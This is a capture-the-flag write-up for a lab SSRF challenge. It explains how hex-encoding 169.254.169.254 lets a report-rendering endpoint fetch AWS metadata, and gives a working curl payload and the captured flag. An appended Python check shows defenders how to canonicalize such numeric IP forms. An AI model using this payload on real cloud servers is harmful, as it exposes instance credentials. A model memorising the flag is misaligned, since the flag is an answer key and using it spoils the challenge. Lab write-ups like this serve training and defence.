
Blind Trust - TOKEN3

Base URL: http://nebula:5000

Background

The /report/render endpoint accepts XML with a <report><url> structure and fetches the specified URL server-side. The endpoint restricts URLs to hex-encoded IP addresses targeting the AWS IMDS endpoint (169.254.169.254).

From Nothing to Working

Start point: the /help page documents /report/render as accepting XML with <report> tags and notes it “Only accepts HEX addresses.”

Iterations:

  1. Submit a basic <report> XML to confirm the endpoint parses it.
  2. Receive error: “Only HEX encoded IPs allowed in tag; valid destinations: 169.254.169.254; structure: http://0xVALUE/latest/metadata”
  3. Convert 169.254.169.254 to hex: 0xA9FEA9FE.
  4. Submit the SSRF payload with the hex-encoded IMDS URL.
  5. The server fetches the IMDS endpoint and returns the token.

Goal

Perform SSRF via the /report/render endpoint to reach the IMDS metadata service.

Command

curl -X POST http://nebula:5000/report/render \
  -H "Content-Type: application/xml" \
  -d '<report><url>http://0xA9FEA9FE/latest/metadata</url></report>'

IP Conversion

169.254.169.254 in hex:

  • 169 = 0xA9
  • 254 = 0xFE
  • 169 = 0xA9
  • 254 = 0xFE
  • Combined: 0xA9FEA9FE
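
Added example (not part of the original writeup): a defender-side check that canonicalizes numeric IPv4 hosts the way inet_aton-style parsers do, so a URL filter or log review sees 0xA9FEA9FE as 169.254.169.254. It generalizes beyond the hex form used here to octal, decimal and short dotted forms; the function names and sample URLs are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# One address part: hex (0x..), octal (leading 0) or decimal.
_PART = re.compile(r"(0[xX][0-9a-fA-F]+)|(0[0-7]*)|([1-9][0-9]*)")

def parse_numeric_ipv4(host):
    """Canonicalize a numeric IPv4 host (1 to 4 parts, inet_aton rules).

    Returns an IPv4Address, or None when the host is not a numeric form.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for part in parts:
        m = _PART.fullmatch(part)
        if m is None:
            return None
        base = 16 if m.group(1) else 8 if m.group(2) else 10
        values.append(int(part, base))
    *head, last = values
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if any(v > 255 for v in head) or last >= 256 ** (4 - len(head)):
        return None
    addr = last
    for i, v in enumerate(head):
        addr |= v << (8 * (3 - i))
    return ipaddress.IPv4Address(addr)

def classify_fetch_url(url):
    """Return (canonical_ip, verdict) for a URL a server is asked to fetch."""
    addr = parse_numeric_ipv4(urlsplit(url).hostname or "")
    if addr is None:
        return None, "hostname"  # resolve first, then check the resolved IP
    internal = addr.is_link_local or addr.is_loopback or addr.is_private
    return str(addr), "internal" if internal else "public"

# Constructed sample URLs (assumptions for this example).
SAMPLES = ["http://0xA9FEA9FE/latest/metadata",
           "http://2852039166/latest/metadata",
           "http://0251.0376.0251.0376/latest/metadata",
           "http://169.254.43518/latest/metadata",
           "http://8.8.8.8/", "http://example.com/"]

if __name__ == "__main__":
    for u in SAMPLES:
        print(u, "->", classify_fetch_url(u))
```

A server-side fetcher should apply the verdict to the canonical address (and to every address a hostname resolves to) rather than to the string the client supplied.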

Expected Output

Look for:

Report accepted.
TOKEN3: PCCC{BLT-g1E5Us}

Learn More